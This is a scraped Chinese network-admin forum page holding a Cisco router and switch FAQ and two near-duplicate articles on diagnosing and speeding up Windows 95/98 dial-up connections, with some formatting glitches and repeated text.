            可以。每一个接口都可以配置为使用不同的路由协议；但是它们必须能够通过再分配路由来交换路由信息。（路由的再分配将在本章的后面进行讨论。）
            2、什么是访问表？
            访问表是管理者加入的一系列控制数据包在路由器中输入、输出的规则。它不是由路由器自己产生的。访问表能够允许或禁止数据包进入或输出到目的地。访问表的表项是顺序执行的，即数据包到来时，首先看它是否是受第一条表项约束的，若不是，再顺序向下执行；如果它与第一条表项匹配，无论是被允许还是被禁止，都不必再执行下面表项的检查了。
            每一个接口的每一种协议只能有一个访问表。
            支持哪些类型的访问表？
            一个访问表可以由它的编号来确定。具体的协议及其对应的访问表编号如下：
            ◎I P标准访问表编号：1～9 9
            ◎I P扩展访问表编号：1 0 0～1 9 9
            ◎I P X标准访问表编号：8 0 0～8 9 9
            ◎I P X扩展访问表编号：1 0 0 0～1 0 9 9
            ◎AppleTa l k访问表编号：6 0 0～6 9 9
            提示在Cisco IOS Release11.2或以上版本中，可以用有名访问表确定编号在1～199的访问表。
            如何创建IP标准访问表？
            一个I P标准访问表的创建可以由如下命令来完成： Access-list access list number {permit |
            deny} source [source-mask]
            在这条命令中：
            ◎access list number：确定这个入口属于哪个访问表。它是从1到9 9的数字。
            ◎permit | deny：表明这个入口是允许还是阻塞从特定地址来的信息流量。
            ◎source：确定源I P地址。
            ◎s o u r c e - m a s
            k：确定地址中的哪些比特是用来进行匹配的。如果某个比特是"1"，表明地址中该位比特不用管，如果是"0"的话，表明地址中该位比特将被用来进行匹配。可以使用通配符。
            以下是一个路由器配置文件中的访问表例子：
            Router# show access-lists
            Standard IP access list 1
            deny 204.59.144.0, wildcard bits 0.0.0.255
            permit any
            3、什么时候使用路由再分配？
            路由再分配通常在那些负责从一个自治系统学习路由，然后向另一个自治系统广播的路由器上进行配置。如果你在使用I G R P或E I G R
            P，路由再分配通常是自动执行的。
            4、什么是管理距离？
            管理距离是指一种路由协议的路由可信度。每一种路由协议按可靠性从高到低，依次分配一个信任等级，这个信任等级就叫管理距离。对于两种不同的路由协议到一个目的地的路由信息，路由器首先根据管理距离决定相信哪一个协议。
            6、如何配置再分配？
            在进行路由再分配之前，你必须首先：
            1) 决定在哪儿添加新的协议。
            2) 确定自治系统边界路由器（ASBR）。
            3) 决定哪个协议在核心，哪个在边界。
            4) 决定进行路由再分配的方向。
            可以使用以下命令再分配路由更新（这个例子是针对OSPF的）：
            router(config-router)#redistribute protocol [process-id] [metric
            metric - value ] [metric-type type - value ] [subnets]
            在这个命令中：
            ◎protocol：指明路由器要进行路由再分配的源路由协议。
            主要的值有： bgp、eqp、igrp、isis、ospf、static [ ip ]、connected和rip。
            ◎process-id：指明OSPF的进程ID。
            ◎metric：是一个可选的参数，用来指明再分配的路由的度量值。缺省的度量值是0。
            7、为什么确定毗邻路由器很重要？
            在一个小型网络中确定毗邻路由器并不是一个主要问题。因为当一个路由器发生故障时，别的路由器能够在一个可接受的时间内收敛。但在大型网络中，发现一个故障路由器的时延可能很大。知道毗邻路由器可以加速收敛，因为路由器能够更快地知道故障路由器，因为hello报文的间隔比路由器交换信息的间隔时间短。
            使用距离向量路由协议的路由器在毗邻路由器没有发送路由更新信息时，才能发现毗邻路由器已不可达，这个时间一般为10～90秒。而使用链接状态路由协议的路由器没有收到hello报文就可发现毗邻路由器不可达，这个间隔时间一般为10秒钟。
            距离向量路由协议和链接状态路由协议如何发现毗邻路由器？
            使用距离向量路由协议的路由器要创建一个路由表（其中包括与它直接相连的网络），同时它会将这个路由表发送到与它直接相连的路由器。毗邻路由器将收到的路由表合并入它自己的路由表，同时它也要将自己的路由表发送到它的毗邻路由器。使用链接状态路由协议的路由器要创建一个链接状态表，包括整个网络目的站的列表。在更新报文中，每个路由器发送它的整个列表。当毗邻路由器收到这个更新报文，它就拷贝其中的内容，同时将信息发向它的邻站。在转发路由表内容时没有必要进行重新计算。
            注意使用IGRP和EIGRP的路由器广播hello报文来发现邻站，同时像OSPF一样交换路由更新信息。EIGRP为每一种网络层协议保存一张邻站表，它包括邻站的地址、在队列中等待发送的报文的数量、从邻站接收或向邻站发送报文需要的平均时间，以及在确定链接断开之前没有从邻站收到任何报文的时间。
            8、什么是自治系统？
            一个自治系统就是处于一个管理机构控制之下的路由器和网络群组。它可以是一个路由器直接连接到一个LAN上，同时也连到Internet上；它可以是一个由企业骨干网互连的多个局域网。在一个自治系统中的所有路由器必须相互连接，运行相同的路由协议，同时分配同一个自治系统编号。自治系统之间的链接使用外部路由协议，例如B
            G P。
            9、什么是BGP？
            BGP(Border
            GatewayProtocol)是一种在自治系统之间动态交换路由信息的路由协议。一个自治系统的经典定义是在一个管理机构控制之下的一组路由器，它使用IGP和普通度量值向其他自治系统转发报文。
            在BGP中使用自治系统这个术语是为了强调这样一个事实：一个自治系统的管理对于其他自治系统而言是提供一个统一的内部选路计划，它为那些通过它可以到达的网络提供了一个一致的描述。
            10、BGP支持的会话种类？
            BGP相邻路由器之间的会话是建立在TCP协议之上的。TCP协议提供一种可靠的传输机制，支持两种类型的会话：
            o 外部BGP（EBGP）：是在属于两个不同的自治系统的路由器之间的会话。这些路由器是毗邻的，共享相同的介质和子网。
            o
            内部BGP（IBGP）：是在一个自治系统内部的路由器之间的会话。它被用来在自治系统内部协调和同步寻找路由的进程。BGP路由器可以在自治系统的任何位置，甚至中间可以相隔数个路由器。
            注意"初始的数据流的内容是整个BGP路由表。但以后路由表发生变化时，路由器只传送变化的部分。BGP不需要周期性地更新整个路由表。因此，在连接已建立的期间，一个BGP发送者必须保存有当前所有同级路由器共有的整个BGP路由表。BGP路由器周期性地发送Keep
            Alive消息来确认连接是激活的。当发生错误或特殊情况时，路由器就发送Notification消息。当一条连接发生错误时，会产生一个notification消息并断开连接。"-来自RFC11654、BGP操作。
            11、BGP允许路由再分配吗？
            允许。因为BGP主要用来在自治系统之间进行路由选择，所以它必须支持RIP、OSPF和
            IGRP的路由选择表的综合，以便将它们的路由表转入一个自治系统。BGP是一个外部路由协议，因此它的操作与一个内部路由协议不同。在BGP中，只有当一条路由已经存在于IP路由表中时，才能用NETWORK命令在BGP路由表中创建一条路由。
            12、如何显示在数据库中的所有BGP路由？
            要显示数据库中的所有BGP路由，只需在EXEC命令行下输入：
            show ip bgp paths
            这个命令的输出可能是：
            Address Hash Refcount MetricPath
            0 x 2 9 7 A 9 C 0 2 0 i
            13、什么是水平分割？
            水平分割是一种避免路由环的出现和加快路由汇聚的技术。由于路由器可能收到它自己发送的路由信息，而这种信息是无用的，水平分割技术不反向通告任何从终端收到的路由更新信息，而只通告那些不会由于计数到无穷而清除的路由。
            14、路由环是如何产生的？
            由于网络的路由汇聚时间的存在，路由表中新的路由或更改的路由不能够很快在全网中稳定，使得有不一致的路由存在，于是会产生路由环。
            15、什么是度量值？
            度量值代表距离。它们用来在寻找路由时确定最优路由。每一种路由算法在产生路由表时，会为每一条通过网络的路径产生一个数值（度量值），最小的值表示最优路径。度量值的计算可以只考虑路径的一个特性，但更复杂的度量值是综合了路径的多个特性产生的。一些常用的度量值有：
            ◎跳步数：报文要通过的路由器输出端口的个数。
            ◎Ticks：数据链路的延时（大约1/18每秒）。
            ◎代价：可以是一个任意的值，是根据带宽，费用或其他网络管理者定义的计算方法得到的。
            ◎带宽：数据链路的容量。
            ◎时延：报文从源端传到目的地的时间长短。
            ◎负载：网络资源或链路已被使用的部分的大小。
            ◎可靠性：网络链路的错误比特的比率。
            ◎最大传输单元（MTU）：在一条路径上所有链接可接受的最大消息长度（单位为字节）。
            IGRP使用什么类型的路由度量值？这个度量值由什么组成？
            IGRP使用多个路由度量值。它包括如下部分：
            ◎带宽：源到目的之间最小的带宽值。
            ◎时延：路径中积累的接口延时。
            ◎可靠性：源到目的之间最差的可能可靠性，基于链路保持的状态。
            ◎负载：源到目的之间的链路在最坏情况下的负载，用比特每秒表示。
            ◎MTU：路径中最小的M T U值。
            16、度量值可以修改或调整吗？
            加一个正的偏移量。这个命令的完整结构如下：可以使用OFFSET-LIST ROUTER子命令
            为访问表中的网络输入和输出度量值添加一个正的偏移量。
            offset-list {in|out} offset [access-list] no offset-list {in|out}
            offset [access-list]
            如果参数LIST的值是0，那么OFFSET参数将添加到所有的度量值。如果OFFSET的值是0，那么就没有任何作用。对于IGRP来说，偏移量的值只加到时延上。这个子命令也适用于RIP和hello路由协议。
            使用带适当参数的NO OFFSET- LIST命令可以清除这个偏移量。
            在以下的例子中，一个使用IGRP的路由器在所有输出度量值的时延上加上偏移量10： offset-list out 10
            下面是一个将相同的偏移量添加到访问表121上的例子：
            offset-list out 10 121
            17、每个路由器在寻找路由时需要知道哪五部分信息？
            所有的路由器需要如下信息为报文寻找路由：
            ◎目的地址：报文发送的目的主机。
            ◎邻站的确定：指明谁直接连接到路由器的接口上。
            ◎路由的发现：发现邻站知道哪些网络。
            ◎选择路由：通过从邻站学习到的信息，提供最优的（与度量值有关）到达目的地的路径。
            ◎保持路由信息：路由器保存一张路由表，它存储所知道的所有路由信息。
            18、Cisco路由器支持的路由协议与其他厂家设备的协议兼容吗？
            除了IGRP和EIGRP，Cisco路由器支持的所有路由协议都与其他厂家实现的相同协议兼容。IGRP和EIGRP是Cisco的专利产品。
            19、RIP路由表的表项的信息说明了什么？
            RIP路由表的每一个表项都提供了一定的信息，包括最终目的地址、到目的地的下一跳地址和度量值。这个度量值表示到目的终端的距离（跳步数）。其他的信息也可以包括。
            路由器问题补充：
            1、Cisco3600系列路由器目前是否支持广域网接口卡WIC-2T和WIC-2A/S？
            Cisco3600系列路由器在12.007XK及以上版本支持WIC-2T和WIC-2A/S这两种广域网接口卡。
            但是需要注意的是：
            只有快速以太网混合网络模块能够支持这两种广域网接口卡。
            支持这两种接口卡的网络模块如下所示：
            NM-1FE2W， NM-2FE2W， NM-1FE1R2W， NM-2W。
            而以太网混合网络模块不支持，如下所示：
            NM-1E2W，NM-2E2W， NM1E1R2W。
            2、Cisco3600系列路由器的NM(4A/S，NM(8A/S网络模块和WIC(2A/S广域网接口卡支持的最大异/同步速率各是多少？
            这些网络模块和广域网接口卡既能够支持异步，也能够支持同步。支持的最大异步速率均为115.2Kbps，最大同步速率均为128Kbps。
            3、WIC-2T与WIC-1T的电缆各是哪种？
            WIC-1T：DB60转V35或RS232、 449等电缆。 如：CAB-V35-MT。
            WIC-2T：SMART型转V35或RS232、 449等电缆。 如： CAB-SS-V35-MT。
            4、Cisco 7000系列上的MCE1与Cisco 2600/3600上的E1、 CE1有什么区别？
            Cisco 7000上的MCE1可配置为E1、 CE1， 而Cisco 2600/3600上的E1、 CE1仅支持自己的功能。
            5、Cisco 2600系列路由器，是否支持VLAN间路由，对IOS软件有何需求？
            Cisco(2600系列路由器中，只有Cisco2620和Cisco2621可以支持VLAN间的
            路由(百兆端口才支持VLAN间路由)。并且如果支持VLAN间路由，要求IOS软件必须包括IP Plus特性集。
            6、Cisco3660路由器与3620/3640路由器相比在硬件上有那些不同？
            不同点如下：
            *
            Cisco3660路由器基本配置包括1或2个10/100M自适应快速以太网接口；而Cisco3620/3640基本配置中不包括以太网接口。
            * Cisco3660路由器支持网络模块热插拔，而 Cisco3620/3640不支持网络模块热插拔。
            * Cisco3660的冗余电源为内置， 而Cisco3620/3640的冗余电源为外置的。
            7、为什么3640不能识别NM-1FE2W？
            需要将IOS升级到12.0.7T
            交换机问题
            关于交换机问题：
            1、Catalyst 35500XL/2950XL的堆叠是如何实现的？
            a. 需要使用专门的堆叠电缆，1米长或50厘米长(CAB-GS-1M或CAB-GS-50CM)以及专门的千兆堆叠卡GigaStack
            GBIC (WS-X3550-XL) (该卡已含CAB-GS-50CM 堆叠电缆)。
            b. 可以选用2种堆叠方法：菊花链法(提供1G的带宽)或点对点法(提供 2G的带宽)。
            c. 2种方法都可以做备份。
            d. 菊花链法最多可支持9台交换机的堆叠， 点对点法最多可支持8台。
            2、Catalyst 3550 XL系列交换机做堆叠时，是否支持冗余备份？
            Catalyst3550XL系列交换机的堆叠有两种实现方法：菊花链方式和点到点方式。
            当使用菊花链方式时，堆叠的交换机依次连接，交换机之间可以达到1Gbps的传输带宽；
            当使用点到点方式时，需要一台单独的 Catalyst3508G-XL交换机，
            其余的交换机通过堆叠GBIC卡和堆叠线缆与3508G相连，这种方法最大可以达到2Gbps的全双工传输带宽。
            这两种方法都分别支持堆叠的冗余连接。当使用菊花链连接方式时，冗余连接是通过将最上面的交换机与最下面的交换机用堆叠线缆相连接完成的。而当使用点到点连接时，是通过使用第2台3508交换机来完成的。
            4、 Catalyst3550 XL的一个千兆口使用堆叠卡做堆叠后， 另外一个千兆口是否可以连接千兆的交换机或千兆的服务器？
            可以。需使用1000Base-SX GBIC或1000Base-LX/LH GBIC。
            5、 Ethernet Channel Tech. 可以应用在什么网络设备之间？如何使用？
            可以应用在交换机之间， 交换机和路由器之间，交换机和服务器之间
            可以将2个或4个10/100Mbps或1000Mbps端口使用 Ethernet Channel
            Tech.，达到最多400M(10/100Mbps端口)、4G(1000Mbps端口)
            或800M(10/100Mbps端口)、8G(1000Mbps端口) 的带宽。
            6、Ethernet Channel Technology有什么作用？
            增加带宽，负载均衡，线路备份
            7、 当端口设置成 Ethernet Channel时，如何选择线路？
            根据数据帧的以太网源地址和目的地址最后1位或2位做或运算，决定从哪条链路输出。对于路由器来说是根据网络地址做或运算，以决定链路的输出。
            8、Ethernet Channel Technology 与 PAgP (Port Aggregation Protocol )
            的区别？
            PAgP是 Ethernet Channel的增强版，它支持在 Ethernet Channel 上的 Spanning Tree
            Protocol和Uplink Fast，并支持自动配置 Ethernet Channel 的捆绑。
            最少需要的电源数 1 2
            包转发速率 18Mpps 18Mpps
            背板带宽 24Gbps 60Gbps
            9、Catalyst4000系列是否支持ISL？
            从Supervisor Engine Software Release 5.1开始支持。
            10、Catalyst4000交换机的冗余电源选项4008/2和4008/3有何区别？
            Catalyst4003交换机机箱上有两个电源插槽，出厂时本身自带一个电源，4008/2是专为其定制的冗余电源。Catalyst4006的机箱上有三个电源插槽，出厂时带有2个电源供电，4008/3是为其定制的专用冗余电源。
            11、Catalyst 4006的三层交换模块是否不含以太网端口?
            不，Catalyst4006的三层交换模块含有32个10/100自适应端口和2个千兆端口。
            在4003上使用时可替代原有的WS-X4232-GB-RJ模块， 从而不影响网络结构。
            12、Catalyst 4000系列模块化交换机使用千兆交换模块时， 如何选用目前存在的两种交换模块(产品编号如下)？
            WS-X4306-GB Catalyst 4000 Gigabit Ethernet Module, 6-Ports (GBIC)
            WS-X4418-GB Catalyst 4000 GE Module, Server Switching 18-Ports
            (GBIC)
            这两个模块的使用环境不同
            WS-X4306-GB是一个6口的千兆交换模块，每个端口独占千兆的带宽，适合做网络的主干，用来连接具有千兆接口的交换机；也可以与具有千兆网卡的服务器相连。
            WS-X4418-GB
            是一个18口的千兆交换模块，其中有两个口是独占千兆的带宽，另外16个口共享8G的全双工的带宽，但每个端口可以突发到千兆。此模块适合在服务器比较集中的地方连接千兆的服务器，而不适合连接网络主干。
            13、Catalyst 6000系列的背板带宽和包转发速率各为多少？
            Catalyst 6500系列的背板带宽可扩展到256Gbps， 包转发速率可扩展到150Mpps； Catalyst
            6000系列作为一个经济有效的解决方案可提供到32Gbps的背板带宽和15Mpps的包转发速率。
            14、Catalyst 6000系列的MSFC 要求多少M DRAM ？
            Catalyst 6000系列IOS软件存放在MSFC里， MSFC要求有128M DRAM。 缺省配置已含128M DRAM。
            15、Catalyst 6000系列上的插槽是否有限制?
            除第一个插槽专用于引擎， 第二个插槽可用于备份引擎或线卡， 其它插槽都用于线卡。
            16、Catalyst 6000系列有几种引擎？
            Catalyst 6000系列的引擎分为Supervisor Engine 1和Supervisor Engine 1A两种， 其中
            Supervisor Engine 1A 有两个特定的备份引擎。其型号分别如下： 型号 描述
            WS-X6K-SUP1-2GE Catalyst 6000 Supervisor Engine1引擎 含两个千兆端口(需购GBIC)
            WS-X6K-SUP1A-2GE Catalyst 6000 Supervisor Engine1A引擎 加强的QOS特性，
            含两个千兆端口(需购GBIC)
            WS-X6K-SUP1A-PFC Catalyst 6000 Supervisor Engine1A引擎
            含两个千兆端口(需购GBIC)和PFC卡
            WS-X6K-S1A-PFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎
            含两个千兆端口(需购GBIC)和PFC卡
            WS-X6K-SUP1A-MSFC Catalyst 6000 Supervisor Engine1A引擎
            含两个千兆端口(需购GBIC)和MSFC、 PFC卡
            WS-X6K-S1A-MSFC/2 Catalyst 6000 Supervisor Engine1A冗余引擎，
            含两个千兆端口(需购GBIC)和MSFC、 PFC卡
            17、Catalyst 6000系列上备份引擎与主引擎必须是一致的吗？
            是的。 Catalyst 6000系列的备份引擎与主引擎必须是一致的，
            例如， 不能将不带MSFC&PFC的引擎给带MSFC&PFC的引擎作备份。
            另外， WS-X6K-SUP1A-PFC 和 WS-X6K-SUP1A-MSFC有专门的备份引擎。
            主、备引擎的对应关系如下：
            主引擎 备份引擎
            WS-X6K-SUP1-2GE WS-X6K-SUP1-2GE
            WS-X6K-SUP1A-2GE WS-X6K-SUP1A-2GE
            WS-X6K-SUP1A-PFC WS-X6K-S1A-PFC/2
            WS-X6K-SUP1A-MSFC WS-X6K-S1A-MSFC/2
            18、Catalyst 6000系列支持的路由协议有哪些？
            Catalyst 6000系列支持的路由协议有：OSPF， IGRP， EIGRP， BGP4， IS-IS， RIP和RIP II；
            对于组播PIM支持sparse和dense两种模式；
            支持的非 IP 路由协议有： NLSP， IPX RIP/SAP， IPX EIGRP， RTMP， Apple Talk
            EIGRP和DECnet Phase IV和V。
            19、Catalyst 6000系列支持的网络协议有哪些？
            MSM上支持 6Mpps 的 IP、 IP 组播和 IPX 。 引擎上的MSFC 支持 15Mpps的 IP、 IP 组播、IPX以及
            AppleTalk、 VINEs、 DECnet.
            20、Catalyst6000上若引擎为SUP-1A-2GE， 怎么实现三层交换的功能？
            用MSM实现。 6000上只有含有MSFC的引擎才能通过MSFC实现三层交换功能， 在6000上， MSFC是不能单独订购的。
            21、Catalyst? 6000交换机和Catalyst? 6500交换机有何区别？6000交换机是否可以升级到6500交换机？
            Catalyst?
            6000系列交换机的背板带宽为32G，而6500系列交换机的背板带宽最大可以扩展到256G。由于这两个系列的交换机使用的背板总线结构不同，所以6000交换机不能升级到6500系列交换机。
            但这两个系列交换机使用相同的交换模块。
            22、Catalyst3508G是否也可以同Catalyst3524一样采用菊花链堆叠模式？
            完全可以。
            23、在交换机之间配置Uplink-Fast时，是否需要关闭原有Spanning-Tree选项？
            不需要，Uplink-Fast实际上使用的是一种简化的Spanning-Tree算法，
            与标准的Spanning-Tree兼容，因此不需关闭该功能。

--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


网络故障诊断和优化

《一键清理系统垃圾》

网络故障诊断和优化

    众所周知，任何计算机只要安装了Windows95/98操作系统，并且正确安装了“Modem”——调制解调器、拨号网络通信组件和TCP/IP协议，再加上一部电话，就可以和Internet进行连接了。但是当你拿到帐号和密码以后，在机器上如何也连不上Internet网，于是就对帐号和密码产生怀疑，其实这些问题的出现完全是由于用户没有正确理解，如何诊断Internet网络、如何提高网络登录与运行速度，仍是许多网民关心的问题。本文将详细地讨论在Windows 95/98环境中如何解决这类问题。

    一、诊断”Modem"

    在安装了调制解调器后，如何检测调制解调器是否运行正常呢?有关该Modem的所有设置参数是否完全正确呢?Windows95/98为此专门提供了一个诊断程序，可以让用户来检测自己的Modem是否工作正常。首先要确认调制解调器的电源打开了，与计算机的连线也都是正确的。

    1.在“控制面板”窗口中双击“调制解调器”图标，则进入了一个“调制解调器属性”对话框，单击“诊断”选项页，会显示一个已经安装了的串行口和调制解调器的列表。

    2.在设备列表中单击要检测的调制解调器所在的端口，然后单击下面的“详细信息”按钮。测试过程可能要进行几分钟。如果调制解调器连接正确，而且工作正常，应显示诊断结果窗口，窗口中有对诊断命令的反应。用户根本不必理解列表的意义，只要列表中有多项内容，并且没有“Error”之类的字符串，一般表明解调器正常工作。

    3.如果弹出“端口已打开”的对话框，或信息中诊断列表是空的，则表示调制解调口没有正常工作，此时需要检查一个连线是否正确，还是驱动程序不正确。

    二、诊断TCP/IP协议是否连通

    在建立了Internet连接后，有时无法接收网络上的信息，此时就可以在“MS DOS方式”使用Ping命令来诊断TCP/IP协议是否连通了。Ping 202.96.64.111（沈阳电信局163服务器IP地址）。

    使用Ping/?可以获得Ping的命令参数。使用这些参数还可以进行其他诊断测试。
注意：在很多的ISP提供的上网手册中，要求设置TCP/IP协议中的一些属性，如DNS（域名服务器）、网关等，实际上这些设置是多余的，完全可以不用。而且在很多情况下设置了TCP/IP协议中的一些属性，反而在使用拨号网络中产生副作用。

    注意：在很多的ISP提供的上网手册中，要求设置TCP/IP协议中的一些属性，如DNS（域名服务器）、网关等，实际上这些设置是多余的，完全可以不用。而且在很多情况下设置了TCP/IP协议中的一些属性，反而在使用拨号网络中产生副作用。

    三、快速连上Internet

    有的用户老是抱怨自己的Internet网络登录时间太长（甚至达到2分钟），这大多是设置不当使连接检测时间超长。例如，在Windows 95中安装了IPX/SPX、NetBEUI等协议，而这些协议对于Internet网络来说是没有用处的，但是在进行Internet网络登录时，系统会不断地检测这些协议，从而使检测的时间过长。解决方法是去掉这些协议的检测。具体操作如下：

    (1)在“我的电脑”窗口中双击“拨号网络”图标，打开“拨号网络”窗口。
    (2)右击该窗口中连接图标，从弹出的快捷菜单中选择“属性”，则出现一个“连接属性”对话框。
    (3)单击“服务器类型”选项页。
    (4)清除如下三个复选框：

    登录网络
    如果选择此选项，系统将使用Windows登录时的用户名、密码登录Internet，这完全不必，因为这两组用户名、密码是不同的两个概念。选择了此选项后，系统会增加一次检测的机会，从而延长了登录的时间。

    IPX/SPX
    这个协议是Novell NetWare客户机使用的一种网络协议，用它可与NetWare服务器相连。因此这个协议在Internet中是多余的。

    NetBEUI
    这个协议适用于小型网络上的高速通信协议，对于使用Internet网络的用户来说也是不必要的，除非你使用局域网连接Internet网络。
通过上面的设置后，连上Internet只需十几秒钟的时间。

    四、端口优化

    对Internet网络进行优化，可以充分地发挥Modem性能，使数据传输量最大。优化Modem性能的基础是端口的优化，其次是注册表中的优化。

    1.更改端口的通信速率

     在windows 95/98中默认的网络设置并不能使你的计算机工作在最优的状态下。比如，在安装Windows 95/98时，端口的缺省速率为9600bps，这显然限制了传输速率。为了更改端口的速率，请执行如下操作步骤：

    （1）在“控制面板”窗口中双击“系统”图标，出现“系统属性”对话框。
    （2）设备管理”选项页。
    （3）列表中单击“端口（COM&LPT）”，然后再单击“通讯端口COM3"（假设Modem安装在COM3上）。
    （4）属性”按钮，再选择“端口设置”选项页，出现端口属性对话框。
    （5）在“波特率”列表框中选择115200，从“流控制”列表框中选“硬件”，然后单击“确定”按钮。
    （6）确定”按钮。

    2.FIFO缓冲区调到最大

   （1）在端口属性对话框中单击“高级”按钮，出现如端口属性高级设置对话框。
    （2）缓冲区”调到“高”处。
    （3）确定后设置生效

    当然，你也可以采用修改注册或使用MTUSpeed等软件进行优化，在这里就不再赘述了。

    五、更改SYSTEM.INI文件

    用记事本等编辑工具打开system.ini文件，在[386ENH]下加入Com3Buffer=1024（3为本人的调制解调器连接的端口）。

    六、Windows 95/98 在拨号上网的设计上有很大的潜力可以挖掘，只要在注册表的适当位置增加MaxMTU、MaxSSS、DefaultTTT及DefaultRevWindow几项就能加快你上网的速度

    在这里首先说明一下网络优化的原理，大家清楚概念以后对下面的设置就不难理解了。信息在网络上传输的时候是分成一定大小的数据包，以包为单位进行传输。在Internet上的节点都有自己设定包的大小值MTU（Max Transmission Unit），按此大小发送和接收数据包。Windows95/98、WindowsNT中默认数据包的大小是1500字节。而有许多节点，尤其是许多ISP的服务器的设置值是576或其它值，而不是1500。这样如果你的机器发送的包的大小为1500而服务器的包为576，就要进行包的分解。因此就有可能在网络上浪费很长时间，降低网络传输速率。所以，你将自己的机器的MTU设置为与Internet大多数结点相同的值，就可以大大提高上网速度。

    1.在左侧的树形键值结构中找到HKEY_LOCAL-_MACHINES\Enum\Root\Net，在这个目录中，会有一个或多个子键：“0000”、“0001”之类等。这个四位数目的子键下会有一个主键名为“Bindings”，在这个主键内会有个名为“MSTCP\xxxx”的键值，记住这后面的四位数字XXXX；

    2.找“HKEY_LOCAL_MACHINES\Enum\Network-\MSTCP\xxxx，”其中XXXX为上一步所记下的四位数，在XXXX这个主键里，会有一个名为“Driver”的字串值，其内容类似“NetTrans\00xx”，其中XX为一个0－30之间的数，记下后面的这个四位数00XX；

    3.找到“HKEY_LOCAL_MACHINES\System\-CurrentControlset\Services\-Class\NetTrans\00xx”这个主键，其中00xx是在上一步记下的四位数，在这个00xx主键内，新增加一个字串值，取名为“MaxMTU”，并设定它的值为“576”；

    4.找到“HKEY_LOCAL_MACHINES\System\-CurrentControlset\Services-\VxD\MSTCP”新增“DefaultRcvWindow”字串值，内容设定为“64000”；找到HKEY_LOCAL_MACHINES\System\Current-Controlset\Services\VxD\NWLink\Ndi-\params\maxsockets\”将此主键下的max的值改为“1020”；在KEY_LOCAL_MACHINES \System\CurrentControlset\Services\VxD\MSTCP下新增字串值“PMTUBlackHoleDetect”，设置值为“0”；在HKEY_LOCAL_MACHINES\System\Current-Controlset\Services\VxD\MSTCP下新增字串值“DefaultTTL”的值设为“128”；重新启动系统以后，设置生效。

    上面的几步设置，你的机器就可以在硬件固定的条件下高速上网了。不过还要多说一句，修改注册表之前别忘了备份！

作者：陈薇


网络故障诊断及网络设置优化

《一键清理系统垃圾》

网络故障诊断及网络设置优化

众所周知，任何计算机只要安装了Windows95/98操作系统，并且正确安装了Modem（调制解调器）、拨号网络通信组件和TCP/IP协议，再加上一部电话，就可以和Internet进行连接了。但是当你拿到帐号和密码以后，在机器上如何也连不上Internet网，你可能会对帐号和密码产生怀疑，其实这些问题的出现完全是由于用户没有正确理解如何诊断Internet网络、如何提高网络登录与运行速度。本文将讨论在Windows 95/98环境中解决这类问题的一些方法。
一、诊断“Modem”
在安装了调制解调器后，如何检测调制解调器是否运行正常呢?有关该Modem的所有设置参数是否完全正确呢?Windows95/98为此专门提供了一个诊断程序，可以让用户来检测自己的Modem是否工作正常。首先要确认调制解调器的电源已经打开了，与计算机的连线也都是正确的。
1.在“控制面板”窗口中双击“调制解调器”图标，则进入了一个“调制解调器属性”对话框，单击“诊断”选项页，会出现一个已经安装了的串行口和调制解调器的列表。
2.在设备列表中单击要检测的调制解调器所在的端口，然后单击下面的“详细信息”按钮。测试过程可能要进行几分钟。如果调制解调器连接正确，而且工作正常，应显示诊断结果窗口，窗口中有对诊断命令的反应。用户根本不必理解列表的意义，只要列表中有多项内容，并且没有“Error”之类的字符串，一般表明调制解调器正常工作。
3.如果弹出“端口已打开”的对话框，或信息中诊断列表是空的，则表示调制解调口没有正常工作，此时需要检查一下连线是否正确，还是驱动程序不正确。
二、诊断TCP/IP协议是否连通
在建立了Internet连接后，有时无法接收网络上的信息，此时就可以在“MS DOS方式”使用Ping命令来诊断TCP/IP协议是否连通了。
使用Ping/?可以获得Ping的命令参数。使用这些参数还可以进行其他诊断测试。
注意：在很多ISP提供的上网手册中，要求设置TCP/IP协议中的一些属性，如DNS（域名服务器）、网关等，实际上这些设置是多余的，完全可以不用。而且在很多情况下设置了TCP/IP协议中的一些属性，反而在使用拨号网络中产生副作用。
三、快速连上Internet
有的用户老是抱怨自己的Internet网络登录时间太长（甚至达到2分钟以上），这大多是设置不当使连接检测时间超长。例如，在Windows 95中安装了IPX/SPX、NetBEUI等协议，而这些协议对于Internet网络来说是没有用处的，但是在进行Internet网络登录时，系统会不断地检测这些协议，从而使检测的时间过长。解决方法是去掉这些协议的检测。具体操作如下：
1.在“我的电脑”窗口中双击“拨号网络”图标，打开“拨号网络”窗口。
2.右击该窗口中的连接图标，从弹出的快捷菜单中选择“属性”，则出现一个“连接属性”对话框。
3.单击“服务器类型”选项页。
4.清除如下三个复选框：
（1）登录网络
如果选择此选项，系统将使用Windows登录时的用户名、密码登录Internet，这完全不必，因为这两组用户名、密码是不同的两个概念。选择了此选项后，系统会增加一次检测，从而延长了登录的时间。
（2）IPX/SPX
这个协议是Novell NetWare客户机使用的一种网络协议，用它可与NetWare服务器相连。因此这个协议在Internet中是多余的。
（3）NetBEUI
这个协议适用于小型网络上的高速通信协议，对于使用Internet网络的用户来说也是不必要的，除非你使用局域网连接Internet网络。
通过上面的设置后，连上Internet只需十几秒钟的时间。
四、端口优化
对Internet网络进行优化，可以充分地发挥Modem性能，使数据传输量最大。优化Modem性能的基础是端口的优化，其次是注册表中的优化。
1.更改端口的通信速率
在Windows 95/98中默认的网络设置并不能使你的计算机工作在最优的状态下。比如，在安装Windows 95/98时，端口的缺省速率为9600bps，这显然限制了传输速率。为了更改端口的速率，请执行如下操作步骤：
（1）在“控制面板”窗口中双击“系统”图标，出现“系统属性”对话框。
（2）选择“设备管理器”选项页。
（3）列表中单击“端口（COM&LPT）”，然后再单击“通讯端口COM3”（假设Modem安装在COM3上）。
（4）按“属性”按钮，再选择“端口设置”选项页，出现端口属性对话框。
（5）在“波特率”列表框中选择115200，从“流控制”列表框中选“硬件”，然后单击“确定”按钮。
2.FIFO缓冲区调到最大
（1）在端口属性对话框中单击“高级”按钮，出现端口属性高级设置对话框。
（2）将“缓冲区”调到“高”处。
（3）确定后设置生效。
当然，你也可以采用修改注册表或使用MTUSpeed等软件进行优化，在这里就不再赘述了。
五、更改SYSTEM.INI文件
用记事本等编辑工具打开system.ini文件，在[386ENH]下加入Com3Buffer=1024（3为本人的调制解调器连接的端口）。
六、Windows 95/98 在拨号上网的设计上有很大的潜力可以挖掘，只要在注册表的适当位置增加MaxMTU、MaxSSS、DefaultTTT及DefaultRevWindow几项就能加快你上网的速度。


网络管理员常见错误集锦

《一键清理系统垃圾》

网络管理员常见错误集锦

